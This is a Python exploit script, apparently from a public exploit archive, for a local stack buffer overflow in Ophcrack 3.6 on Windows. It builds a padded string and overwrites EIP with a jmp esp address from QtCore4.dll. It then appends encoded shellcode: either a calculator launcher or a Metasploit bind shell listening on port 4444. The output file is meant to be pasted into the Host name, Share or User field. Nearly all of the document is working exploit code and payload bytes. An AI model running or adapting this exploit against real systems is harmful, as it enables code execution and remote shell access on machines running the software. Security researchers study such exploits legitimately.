#!/usr/bin/python
# Title: Ophcrack 3.6 Local Stack Based Buffer Overflow
# Version: 3.6
# Tested on: Windows XP SP2 en, Windows 8 64-bit
# Vendor: http://ophcrack.sourceforge.net/
# Software Link: http://sourceforge.net/projects/ophcrack/files/ophcrack/3.6.0/ophcrack-win32-installer-3.6.0.exe
# Original Advisory: http://osandamalith.wordpress.com/2013/12/29/ophcrack-local-stack-based-buffer-overflow/
# E-Mail: osandajayathissa@gmail.com
# Exploit-Author: Osanda Malith 
# Twitter: @OsandaMalith
# /!\ Author is not responsible for any damage you cause
# This POC is for educational purposes only
# Video: https://www.youtube.com/watch?v=YPPIyxPMakI
'''
This exploit is super lame, as no user is going to paste 1000 characters
of text into the textbox, however it could potentially be used for
privilege escalation. It was still a fun learning exercise.
'''
'''
To exploit this bug open Ophcrack -> Click Load -> Remote SAM
There are three fields "Host name:", "Share:", "User:"
All three fields are vulnerable. I have made this exploit to work on those 3 fields.
Copy the contents written to the file into the specific field you selected and click ok.
'''
print '''
                                                                              
     _/_/              _/                                                _/   
  _/    _/  _/_/_/    _/_/_/      _/_/_/  _/  _/_/    _/_/_/    _/_/_/  _/  _/
 _/    _/  _/    _/  _/    _/  _/        _/_/      _/    _/  _/        _/_/   
_/    _/  _/    _/  _/    _/  _/        _/        _/    _/  _/        _/  _/  
 _/_/    _/_/_/    _/    _/    _/_/_/  _/          _/_/_/    _/_/_/  _/    _/ 
        _/                                                                    
       _/                                                                     
  
[+] Opchrack 3.6 Local Buffer Overflow Exploit
[+] Author: Osanda Malith Jayathissa < osandajayathissa [at] gmail.com >
[~] Special Thanks to Matt "hostess" Andreko < mandreko [at] accuvant.com >

'''
while True:
  try:
    choice = int(raw_input("[?] In which field do you want to inject our payload?\n1.Host name\n2.Share\n3.User\n"))
  except ValueError:
    print "[!] Enter only a number"
    continue
  # If you select "Host name" you would get a error after injecting. Click "Don't send" and enjoy the payload  
  if choice == 1:
    buff = "A" * 497 
    break
  elif choice == 2:
    buff = "A" * 504
    break
  elif choice == 3:
    buff = "A" * 504
    break  
  else:
    print "[-] Invalid Choice"
    continue
# jmp instruction must be 'ascii' due to character set restrictions
# jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [QtCore4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.8.4.0 (C:\Program Files\ophcrack\QtCore4.dll)
eip = "\x39\x5b\x2b\x6e" 

while True:
  try:
    choice = int(raw_input("[?] Choose your payload:\n1.Calculator\n2.Bind Shell\n"))
  except ValueError:
    print "[!] Enter only a number"
    continue
    
  if choice == 1:
    #ALPHA3.py esp --input="shellcode.bin" 
    shellcode =  "TYhffffk4diFkDql02Dqm0D1CuEE0l3i8o3J378P4P8L4u8L3g0f3A0B1n2K405o7N5K328O4E3T4I0g"
    shellcode += "0c1k0Q4M358P5M4y0I2Z3g3I3E3E2j4C2r110H135l0p0H7o381M0E0s3i4Z3D4p5k2C1l335N4R4L4D"
    shellcode += "3w4X4H1L4p2n3R3M3L3C2x4s8o4H3M8N4y3J4P3j4S1k3b3L0h2r08125o1K0b1o101P0514373A1o0Z"
    shellcode += "3O340Q0O0n5n4F4B8n4X1k0i4u4m0S407o0c1m4m4P5M2y135O1K0V1l4z3D0G3S0h120C4I183B0y14"
    shellcode += "3h4H3G8K3S1L2k3E4r162Z3E7k5O138P5L3H0O0c0T15034I0v3M3P4H3h0Z2H3w3h3C002k7l4L3J1L"
    shellcode += "2F3h0w3q0b8O3u2q064O1p4K3w0P3S0w1N2O2B043K0K7p3r4n1k2z0p017k0F3p4Y0u093d301n0n"  
    break
  elif choice == 2:
    # Thanks to Matt for teaching me about choosing correct shellcode :-)
    # Modify this part with your own custom shellcode
    # msfpayload windows/shell/bind_tcp EXITFUNC=thread LPORT=4444 R| msfencode -e x86/alpha_mixed -t c BufferRegister=ESP
    shellcode = (
          "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
          "\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
          "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
          "\x50\x38\x41\x42\x75\x4a\x49\x49\x6c\x69\x78\x4e\x69\x73\x30"
          "\x65\x50\x47\x70\x71\x70\x6f\x79\x39\x75\x74\x71\x78\x52\x31"
          "\x74\x6e\x6b\x70\x52\x50\x30\x4e\x6b\x33\x62\x34\x4c\x4c\x4b"
          "\x66\x32\x64\x54\x4c\x4b\x51\x62\x74\x68\x64\x4f\x4e\x57\x51"
          "\x5a\x45\x76\x45\x61\x59\x6f\x74\x71\x59\x50\x4e\x4c\x37\x4c"
          "\x70\x61\x53\x4c\x56\x62\x76\x4c\x47\x50\x39\x51\x7a\x6f\x56"
          "\x6d\x46\x61\x6a\x67\x78\x62\x7a\x50\x70\x52\x46\x37\x4e\x6b"
          "\x52\x72\x76\x70\x6e\x6b\x37\x32\x65\x6c\x43\x31\x4a\x70\x4c"
          "\x4b\x71\x50\x54\x38\x4c\x45\x59\x50\x62\x54\x50\x4a\x45\x51"
          "\x6e\x30\x32\x70\x6e\x6b\x71\x58\x46\x78\x6c\x4b\x50\x58\x31"
          "\x30\x65\x51\x49\x43\x38\x63\x47\x4c\x32\x69\x4c\x4b\x54\x74"
          "\x6c\x4b\x37\x71\x58\x56\x46\x51\x69\x6f\x56\x51\x39\x50\x4e"
          "\x4c\x5a\x61\x6a\x6f\x76\x6d\x46\x61\x68\x47\x57\x48\x6d\x30"
          "\x31\x65\x6c\x34\x53\x33\x73\x4d\x39\x68\x67\x4b\x31\x6d\x64"
          "\x64\x43\x45\x58\x62\x51\x48\x4c\x4b\x53\x68\x61\x34\x66\x61"
          "\x6a\x73\x35\x36\x6c\x4b\x44\x4c\x42\x6b\x6e\x6b\x71\x48\x67"
          "\x6c\x33\x31\x6b\x63\x6c\x4b\x47\x74\x4e\x6b\x55\x51\x6a\x70"
          "\x4e\x69\x63\x74\x67\x54\x47\x54\x71\x4b\x43\x6b\x45\x31\x76"
          "\x39\x52\x7a\x73\x61\x69\x6f\x6b\x50\x32\x78\x63\x6f\x72\x7a"
          "\x4c\x4b\x36\x72\x58\x6b\x6d\x56\x61\x4d\x62\x48\x65\x63\x50"
          "\x32\x45\x50\x35\x50\x31\x78\x64\x37\x54\x33\x76\x52\x43\x6f"
          "\x63\x64\x50\x68\x50\x4c\x54\x37\x37\x56\x65\x57\x59\x6f\x48"
          "\x55\x6f\x48\x6a\x30\x76\x61\x45\x50\x53\x30\x66\x49\x6f\x34"
          "\x30\x54\x32\x70\x75\x38\x37\x59\x6b\x30\x30\x6b\x57\x70\x49"
          "\x6f\x68\x55\x56\x30\x42\x70\x50\x50\x32\x70\x31\x50\x36\x30"
          "\x73\x70\x50\x50\x35\x38\x68\x6a\x74\x4f\x49\x4f\x69\x70\x39"
          "\x6f\x39\x45\x4c\x49\x6a\x67\x55\x61\x59\x4b\x56\x33\x52\x48"
          "\x74\x42\x47\x70\x56\x71\x33\x6c\x4e\x69\x39\x76\x31\x7a\x64"
          "\x50\x52\x76\x56\x37\x32\x48\x59\x52\x59\x4b\x37\x47\x55\x37"
          "\x79\x6f\x4a\x75\x50\x53\x50\x57\x31\x78\x68\x37\x7a\x49\x54"
          "\x78\x4b\x4f\x59\x6f\x4a\x75\x50\x53\x62\x73\x31\x47\x45\x38"
          "\x50\x74\x4a\x4c\x57\x4b\x68\x61\x59\x6f\x4e\x35\x72\x77\x4e"
          "\x69\x4b\x77\x65\x38\x52\x55\x50\x6e\x50\x4d\x35\x31\x59\x6f"
          "\x5a\x75\x65\x38\x70\x63\x70\x6d\x70\x64\x35\x50\x6f\x79\x79"
          "\x73\x61\x47\x72\x77\x43\x67\x70\x31\x68\x76\x53\x5a\x54\x52"
          "\x33\x69\x32\x76\x59\x72\x69\x6d\x51\x76\x4f\x37\x70\x44\x47"
          "\x54\x45\x6c\x36\x61\x35\x51\x6c\x4d\x43\x74\x75\x74\x62\x30"
          "\x49\x56\x73\x30\x42\x64\x63\x64\x52\x70\x63\x66\x30\x56\x70"
          "\x56\x43\x76\x63\x66\x72\x6e\x52\x76\x63\x66\x50\x53\x53\x66"
          "\x63\x58\x52\x59\x4a\x6c\x65\x6f\x4f\x76\x49\x6f\x48\x55\x6b"
          "\x39\x79\x70\x70\x4e\x72\x76\x30\x46\x79\x6f\x44\x70\x50\x68"
          "\x33\x38\x4e\x67\x45\x4d\x51\x70\x39\x6f\x58\x55\x6f\x4b\x59"
          "\x70\x35\x4d\x37\x5a\x75\x5a\x31\x78\x6f\x56\x7a\x35\x4d\x6d"
          "\x6f\x6d\x79\x6f\x38\x55\x67\x4c\x57\x76\x73\x4c\x65\x5a\x6f"
          "\x70\x49\x6b\x6b\x50\x74\x35\x66\x65\x6d\x6b\x31\x57\x72\x33"
          "\x61\x62\x70\x6f\x32\x4a\x37\x70\x56\x33\x59\x6f\x69\x45\x41"
          "\x41")
    print "[+] Connect on port 4444"
    break
  else:
    print "[-] Invalid Choice"
    continue

junk = "A" * 100
# Glad to write this at 17 ;)
# Combine strings
exploit = buff + eip + shellcode + junk
print "[+] Writing to file >> exploit.txt"
# Write it out to file
file = open("exploit.txt", "w")
file.write(exploit)
file.close()
print "[~] " + str(len(exploit)) + " Bytes written to file"  
print "[+] Copy all the contents inside the file into the field you selected and click ok"
#EOF